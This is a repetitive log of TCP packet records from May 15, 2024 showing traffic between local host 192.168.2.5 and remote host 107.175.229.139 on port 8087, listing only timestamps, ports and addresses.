May 15, 2024 01:56:53.524499893 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524511099 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524522066 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524535894 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524538994 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524550915 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524563074 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524565935 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524575949 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524580002 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524588108 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524599075 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524606943 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524611950 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524624109 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524635077 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524635077 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524648905 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524658918 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524665117 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524677038 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524681091 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524688005 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524699926 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524708986 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524710894 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524722099 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524760008 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524779081 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524791002 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524801970 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524815083 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524823904 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524827003 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524837971 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524849892 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524854898 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524861097 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524873018 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524879932 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524890900 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524902105 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.524904966 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.524934053 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525043011 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525054932 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525063992 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525074959 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525085926 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525089979 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525098085 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525109053 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525110006 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525120974 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525134087 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525134087 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525145054 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525146961 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525156021 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525166988 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525177956 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525183916 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525188923 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525202036 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525209904 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525213003 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525223970 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525244951 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525270939 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525295019 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525307894 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525317907 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525329113 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525340080 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525346041 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525357962 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525363922 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525368929 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525379896 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525392056 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525396109 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525403976 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525414944 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525417089 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525427103 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525438070 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525448084 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525449991 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525455952 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525461912 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525475025 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525485992 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525496006 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525497913 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525509119 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525520086 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525525093 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525532007 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525537014 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525543928 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.525552988 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.525585890 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.566118002 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697225094 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697249889 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697263002 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697273970 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697285891 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697288036 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697299004 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697310925 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697321892 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697324991 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697333097 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697344065 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697354078 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697366953 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697371006 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697385073 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697386980 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697397947 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697408915 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697412968 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697422028 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697444916 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697472095 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697473049 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697484970 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697495937 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697506905 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697518110 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697521925 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697529078 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697540045 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697551012 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697551966 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697581053 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697598934 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697612047 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697623968 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697634935 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697647095 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697655916 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697669983 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697680950 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697684050 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697691917 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697726965 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697776079 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697788000 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697799921 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697819948 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697835922 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697849989 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697859049 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697860956 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697873116 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697884083 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697887897 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697906017 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697911024 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697947025 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697952986 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.697959900 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697971106 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697988033 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.697997093 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698026896 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698077917 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698090076 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698101044 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698111057 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698122025 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698127031 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698133945 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698147058 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698149920 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698163986 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698168993 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698175907 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698188066 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698208094 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698209047 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698220968 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698227882 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698231936 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698252916 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698257923 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698266029 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698287964 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698299885 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698335886 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698368073 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698380947 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698391914 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698404074 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698416948 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698419094 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698427916 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698446989 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698448896 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698462009 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698467970 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698472977 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698483944 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698497057 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698514938 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698518038 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698548079 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698560953 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698573112 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698591948 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698606968 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698611975 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698688030 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698699951 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698712111 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698724031 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698725939 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698754072 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698764086 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698776007 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698786974 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698797941 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698802948 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698810101 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698821068 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698827982 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698843956 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698856115 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698864937 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698867083 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698884010 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698884010 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698896885 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698906898 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698913097 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698918104 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698929071 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698942900 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698954105 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698964119 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698964119 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698981047 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.698988914 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.698995113 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699023008 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699028015 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699040890 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699068069 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699129105 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699141026 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699151993 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699162960 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699171066 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699173927 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699184895 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699193001 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699197054 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699218035 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699229002 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699239969 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699242115 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699263096 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699285984 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699311972 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699326992 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699350119 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699397087 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699409008 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699420929 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699431896 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699439049 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699443102 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699455023 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699457884 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699465990 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699479103 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699485064 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699506044 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699544907 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699558020 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699568987 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699580908 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699589014 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699593067 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699610949 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699628115 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699640989 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699644089 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699656963 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699667931 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699681044 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699709892 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699738026 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699749947 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699762106 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699771881 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699783087 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699784994 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699795008 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699805975 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699807882 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699816942 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699827909 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699834108 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699841022 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699866056 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699867010 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699877977 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699889898 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699892044 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699902058 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699913025 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699919939 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699924946 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699937105 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699948072 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699948072 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699959993 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699968100 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.699973106 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699985027 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.699997902 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.700006962 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700021029 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700026989 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.700032949 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700046062 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.700074911 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.700078964 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700093031 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700109959 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700122118 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700134993 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700139046 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.700146914 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700159073 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.700159073 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.700174093 CEST	8087	49708	107.175.229.139	192.168.2.5
